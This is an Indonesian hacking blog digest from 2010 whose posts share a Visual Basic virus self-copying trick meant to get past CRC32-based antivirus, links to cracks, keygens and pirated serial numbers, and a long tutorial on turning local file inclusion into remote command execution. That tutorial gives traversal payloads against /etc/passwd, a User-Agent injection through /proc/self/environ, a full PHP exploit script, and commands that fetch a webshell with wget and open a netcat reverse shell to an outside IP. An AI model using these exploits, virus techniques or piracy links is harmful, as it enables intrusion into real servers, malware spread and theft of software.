26 April 2010

Ora Gene-Gene | White Hack System Only

Ora Gene-Gene | White Hack System Only



Tehnik Mutasi Virus

Posted: 25 Apr 2010 09:17 PM PDT

Yoooo
Aku sarankan bagi kalian yang udah master jangan baca tutorial ini.
Just for newbie!

Oke langsung aja. Aku akan menjelaskan bagaimana sebuah virus memiliki lebih dari satu crc32. Dan yang pasti virus ini akan lolos dari cengkeraman antivirus yang berbasis crc32. (Nampaknya artikel ini bikin kontroversi aja!)

Agar sebuah virus punya banyak crc32 dan md5, virus tak membutuhkan "Filecopy" untuk berduplikasi atau dengan kata lain beranak-cucu.

Sekarang tinggalkan kebiasaanmu menggunakan "Filecopy" untuk duplikasi virus. Sekarang ada cara baru dan aku yakin udah banyak master virus yang tahu soal ini.
Biasanya dulu kamu diajari oleh "nenek moyangmu" untuk menduplikasikan virus dengan kode berikut ini:

Filecopy App.path & "\" & App.EXEName & ".exe", bla bla bla & ".exe"
Otomatis dengan cara itu, virus cuma punya satu crc32 saja!
Tapi gimana kalau dengan kode dibawah ini:


Code:
Function MutasiKe (Lokasi As String)
ReDim KodeVirus(FileLen(App.Path & "\" & App.EXEName & ".exe"))As Byte
Open App.Path & "\" & App.EXEName & ".exe" For Binary As #1
Get #1, , KodeVirus
Close #1
Open Lokasi For Binary As #1
Put #1, , KodeVirus
Close #1
End Function
Private Sub Form_Load()
Bla bla bla….
MutasiKe Environ$("windir") & "\Yooooo.exe"
End Sub
Dengan kode ini pasti crc32 virus induk dengan virus anak punya crc32 yang berbeda. Memang kejahatan IT selalu berkembang, Bung!! (Aku ngutip omongan seseorang(aku lupa orangnya siapa))
Tapi selalu saja ada yang bisa menangkal kejahatan!
Misalnya untuk mengatasi masalah virus (yang udah pake cara diatas) bisa dengan cara MD5. Meskipun crc32 berbeda, tapi MD5-nya tetap sama!
Bahkan lebih dari 10 crc32 sekalipun, tetap saja MD5-nya sama!

Mungkin sekian tutorial saya, Thanks buat newbie dan para master yang udah baca!!

Tools Lacak Nomor Hape

Posted: 25 Apr 2010 09:10 PM PDT

lage Iseng2 cari game J2ME tuk hp.. eh.. malah nemu program tuk lacak nomor HP/Telp nich...

1.) Tuk Komputer :
Telephone Direktory,tuk lacak mobile codes,STD Codes dan ISD Code.
2.) Tuk Mobile(Java Version dan Windows Mobile-Smart Phone,Pocket PC dan Touch Screen) :
Mobile Number Locator.
tuk download tu smua coba mampir ke website : http://www.internet4mobile.com/mobile_nu...cator.aspx

Rapidshare NoLimits

Posted: 25 Apr 2010 08:39 PM PDT

langsung aja sodaraku semua..
ga pakek basa-basi..
ni nemu waktu lagi braowsing di mbah gugel

progie bwat Donlot Rapidshare.
ga cuma rapidshare sih..
file apa aja kayaknya bisa deh..

LINK PROGIE : http://senbit.com/download.htm
LINK PATCH : http://keygens.nl/crack/125513/
ato ksini aja gan..
http://rs276.rapidshare.com/files/341298...0_LKKR.rar


okeh, semoga membantu,
sekedar sharing aja,
mungkin ada yg butuh.

nih bwat skrinsuth.

[Image: sp2.jpg]

[Image: sp1.jpg]

LFI Remote Command Execution ( Tool )

Posted: 25 Apr 2010 08:33 PM PDT

Kelanjutan dari tread aq tentang exploitasi LFI dengan methode httphijack pada environ :
Disana, yang belum mengerti tentang konsep LFI, baca di situ. di bahas tuntas UNCENCORED!!!

Kelanjutan tutorial tersebut, berikut salah satu variasi tools yg bisa di hasilkan. dengan teknik yang sama.


Code:
http://montemedina.com/libraries/phpmysql

tinggal masukin url target nya. lengkap dengan bug nya. seperti berikut:

Code:
www.gombel.com//index.php?option=com_vehcle&control=

kotak command, trserah. misal ls -la. key. seip.

ScreenSyut:

LFI Remote Command Execution (PoC - Code - Exploit)

Posted: 25 Apr 2010 08:28 PM PDT

Setelah sekian lama g posting, akhirnya bisa juga nulis nih tutor wlo mata dah burem merem melek. Keep Powerfulll!!

Local File Inclusion (LFI) sama halnya dengan RFI. perbedaannya adalah, kalau rfi, kita mengincludkan file secara remote. Sedangkan LFI, kita bisa mengincludekan file yang ada di komputer victim. Dari sifatnya inilah, kita bisa memanfaatkanya untuk menyusup ke server secara lebih dalam. banyak methode yg bisa kita lakukan, misal dengan menginjeksi apache log access, dll. mengenai teknik apache log injection, nantikan di HNEzine v2. sudah gw tulis, tinggal upload aja.

Pada tutorial kali ini, gw coba menjelaskan bagaimana membuat sebuah Remote Command Execution (RCE) pada LFI dengan memanfaatkan ENVIRON (/proc/self/environ). Bagaimana file environ ini bisa menjadi sebuah RCE melalui LFI? jawabanya simple, karena kita bisa menginclude file environ ini, dan kita bisa memanipulasi header browser kita untuk mengirim membuat sebuah RCE dan mengexploitasinya. bingung? sama, gw jg bingung.

teknik injeksi lfi, seperti pada umumnya, kita harus menemukan dulu direktori utama dari server ini. teknik kuno yg ampuh adalah dengan mencoba satu persatu, dan menaikan ke tingkat direktori di atasnya. perhatikan:

Code:
http://site.com/buglfi.php?exp=../etc/passwd <<< percobaan pertama naik 1 direktori di atas.
bila gagal, naikan lagi ke direktori di atasnya lagi :
Code:
http://site.com/buglfi.php?exp=../../etc/passwd
http://site.com/buglfi.php?exp=../../../etc/passwd
http://site.com/buglfi.php?exp=../../../../etc/passwd <<< terus naik sampai file /etc/passwd terinclude.
contoh isi dari /etc/passwd

Code:
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin

bila menemui halaman berisi seperti itu, berarti sudah ketemu letak direktori root. misal :

Code:
http://site.com/buglfi.php?exp=../../../../../etc/passwd

itu adalah teknik mendasar dari LFI. teknik tersebut tetep di perlukan untuk menemukan direktori root.

next, seperti yg gw katakan tadi, kita akan membuat RCE melalui ENVIRON.

Langsung aja kita include file environ ini.

Code:
http://site.com/buglfi.php?exp=../../../../../proc/self/environ

injek dan dapatkan output dari file ini. apa yang terlihat?

Code:
DOCUMENT_ROOT=/home/rialto/public_html?GATEWAY_INTERFACE=CGI/1.1?HTTP_ACCEPT=text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5?HTTP_ACCEPT_CHARSET=ISO-8859-1,utf-8;q=0.7,*;q=0.7?HTTP_ACCEPT_ENCODING=gzip,deflate?HTTP_ACCEPT_LANGUAGE=en-us,en;q=0.5?HTTP_CONNECTION=keep-alive?HTTP_HOST=www.liveattherialto.com?HTTP_KEEP_ALIVE=300?HTTP_USER_AGENT=[b]Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404[/b]

perhatikan output tersebut. amati apa yg tampak. cari2 apa yg bisa kita manfaatkan. cari detil demi detil. putar otak kiri kanan atas bawah. ketemu? yap. bener. itu dia. qe3.

perhatikan text yg tak tebalkan. itu adalah user agent. informasi yg di berikan oleh "browser kita" ke server. yg berarti informasi tersebut "di kirim oleh browser kita" ke server. seip. baca 5x klo g paham. itu muncul mozilla karena gw emang pakai mozilla firefox. info itu di kirim oleh browserq ke server victim. baca paragraf ini sampai paham.

sekarang kita inget hal penting dalam hacking, pengetahuan basic dari webhacking :
"sesuatu (input,variable,script) yang di kirimkan dari browser, bisa di manipulasi melalui browser agar di proses oleh server".

Lalu apa hubunganya hal ini dengan inject environ? simple sob. Perhatikan output yang kita terima setelah kita menginclude file environ. informasi useragent dari browser kita di tampilkan oleh file ini, berarti kita bisa memanipulasi user agent ini sesuai yang kita inginkan. Salah satunya mengirimkan perintah jahat ke victim ((demit mode on)).

Untuk manipulasi header ini, ada cara yg sangat mudah, yaitu dengan menggunakan addons firefox bernama tamper. but gw g akan menggunakan cara instan seperti itu, karena kita sedang belajar. Jadi gw akan jelaskan Proof Of Concept nya se mampu gw. qe3.

OK. Next --> Coding.
gw harap g bosen ama coding. karena kita hidup di dunia 0 dan 1, jd mau tidak mau harus selalu berususan dengan coding.

###[ HTTPQUERY pada PHP ]###
http query berfungsi untuk melakukan koneksi ke sebuah host melalui protokol http, kemudian mengambil output dari hasil query. ringkasnya httpquery bersifat seperti web browser.

Code:
$sock = fsockopen("sasaran.com","80",$errno,$errstr,30); // lakukan koneksi ke sasaran.com port 80
$get = "GET /index.php HTTP/1.1\r\n". // minta file index.php (browsing membuka file index.php)
"Host: sasaran.com\r\n". // hostname
"Accept: */*\r\n". // accepted methode
"User-Agent: Mozilla/5.0 \r\n". // [b]USER AGENT[/B]
"Connection: Close\r\n\r\n"; // tutup koneksi
fputs($sock,$get); // kirimkan request
while (!feof($sock)) { // ambil output yg di terima dari hasil kirim request
$output .= trim(fgets($sock, 3600))."\n";
}
fclose($sock); // tutup koneksi
echo $output; // tulis/cetak hasil httpquery
?>

dengan cara seperti ini, kita akan mendapatkan hasil yang sama dengan browsing menggunakan browser. bedanya kita bebas mengirimkan header http apa aja. perhatikan bagian USER AGENT. di situ gw tuliskan Mozilla/5.0. sehingga informasi browser yang di terima oleh sasaran.com adalah Mozilla/5.0. Kalau user agent gw isi dengan nama gw, maka server akan mengetahui kalau useragent adalah ArRay.

Code:
"User-Agent: ArRay \r\n"

sehingga, hasil output ke browser, akan tertulis useragent adalah ArRay.

dengan cara seperti ini, kita bisa menyisipkan malicious code ke server.

Code:
"User-Agent: Mozilla/5.0 \r\n"

dengan cara seperti itu, maka shell command uname -a dan ls -la akan di jalankan di sasaran.com dan hasilnya di cetak di browser. jadilah sebuah teknik menginjeksi yg mudah. begitulan PoC dasar dari teknik ini.

Code:
$sock = fsockopen("sasaran.com","80",$errno,$errstr,30);
$get = "GET /index.php HTTP/1.1\r\n".
"Host: sasaran.com\r\n".
"Accept: */*\r\n".
"User-Agent: Mozilla/5.0 \r\n".
"Connection: Close\r\n\r\n";
fputs($sock,$get);
while (!feof($sock)) {
$output .= trim(fgets($sock, 3600))."\n";
}
fclose($sock);
echo $output;
?>

dengan merubah user agent, kita bisa mengirimkan command apa aja ke server. sebuah malicious yg mudah dan menyenangkan. kita bisa merubahnya dan menjalankan satu demi satu.

seperti yg gw katakan tadi, kita akan membuat sebuah RCE. Sehingga kita bisa mengirimkan command2 ke server dengan mudah layaknya menginjeksi bug RCE, tanpa harus edit2 coding lg. kita tinggal mengedit code tersebut menjadi lebih otomatis.

contoh berikut, gw membuat script nya untuk di jalankan di command line interface. dengan script berikut, gw akan mengirimkan command ke server dengan cara berikut (in CLI misanl SSH):

./lfi "http://sasaran.com/buglfi.php?example=[command-command ke server]"
./lfi "http://sasaran.com/buglfi.php?example=[uname -a; pwd; ls -la; find ./ -perm 777 -type d]" << contoh

Code:
#!/usr/bin/php
//ambil variable
$com = str_replace('"','',$_SERVER['argv'][1]); // hilangkan petik
$sub = explode("[",$com); // pisah bug dengan command
$url = str_replace("http://","",sub[0]); // url
$sites= explode("/",$url); // sitename
$site = $sites[0];
$bug = str_replace($site."/","",$url); // bug path
$cmd = substr($sub[1],0,(str_len($sub[1])-1)); // command

//dapatkan path direktori utama
$path = '/';
while(!$mainpath){
$output = false;
$sock = fsockopen($site,"80",$errno,$errstr,15);
$get = "GET /".$bug.$path."etc/passwd HTTP/1.1\r\n".
"Host: ".$site."\r\n".
"Accept: */*\r\n".
"User-Agent: Mozilla/5.0\r\n".
"Connection: Close\r\n\r\n";
fputs($sock,$get);
while (!feof($sock)) {
$output .= trim(fgets($sock, 3600))."\n";
}
fclose($sock);
if(eregi("root:",$output)){
$mainpath = $path;
}
$path .= "../";
}

// hentikan exploitasi jika tidak mendapatkan main direktori path
if(!$mainpath){
print "Failed!\r\n"; exit();
}

//injek environ
$output = false;
$sock = fsockopen($site,"80",$errno,$errstr,15);
$get = "GET /".$bug.$mainpath."proc/self/environ HTTP/1.1\r\n".
"Host: ".$site."\r\n".
"Accept: */*\r\n".
"User-Agent: Mozilla/5.0 '.system('".$cmd."').'[HNUnderGroundCoder]';\r\n".
"Connection: Close\r\n\r\n";
fputs($sock,$get);
while (!feof($sock)) {
$output .= trim(fgets($sock, 3600))."\n";
}
fclose($sock);

//failed jika tidak bisa include environ/gagal
if(!eregi("[HNUnderGroundCoder]",$output)){
print "Failed!\r\n"; exit();
}

//ambil output command
$result = explode("[HNUnderGroundCoder]",$output);
$hasilcommand = $result[1];

print $hasilcommand."\r\n";
exit();
?>

seip. dengan script sederhana tersebut, gw dpt RCE dari LFI.

####[ Scenario upload webshell ]####
Code:
./lfi "http://sasaran.com/buglfi.php?example=[find ./ -type d -perm 777]"
./lfi "http://sasaran.com/buglfi.php?example=[cd writeable/dir/; wget http://shell.ku/bd.txt; mv bd.txt bd.php]"

Shell uploaded to http://sasaran.com/writeable/dir/bd.php

####[ Scenario backconnect ]####
Code:
./lfi "http://sasaran.com/buglfi.php?example=[find ./ -type d -perm 777]"
./lfi "http://sasaran.com/buglfi.php?example=[cd writeable/dir/; wget http://shell.ku/nc;]"
./lfi "http://sasaran.com/buglfi.php?example=[writeable/dir/nc -vv 202.212.22.11 9999 -e /bin/bash &]"

qeqeqeqeqeqeqe

begitulah, salah satu jurus exploitasi lfi. pada teknik ini, selain belajar teknik lfi, kita juga secara tidak langsung belajar untuk mengirimkan command dengan manipulasi header http yang memanfaatkan sifat dari server. teknik seperti ini juga bisa di pakai pada bug lain yang memiliki sifat yg sama, yaitu mencetak informasi yang dikirim dari browser. karena, segala sesuatu yang di kirimkan dari browser bisa kita manipulasi sesuka kita. ini adalah hukum alam. qeqeeqeqe. kembangin sendiri script tersebut. sempurnain, cz itu juga asal ketik. qeqeqe

1 Million Serial Number

Posted: 25 Apr 2010 08:15 PM PDT

1.000.000 Serial Number |Sofware & Program 2009|

Lumayan ..... Buat nambah-nambahin koleksi,,,,

Download : disana

CorelDraw X5 Final

Posted: 25 Apr 2010 08:11 PM PDT

Tidak ada komentar:

Posting Komentar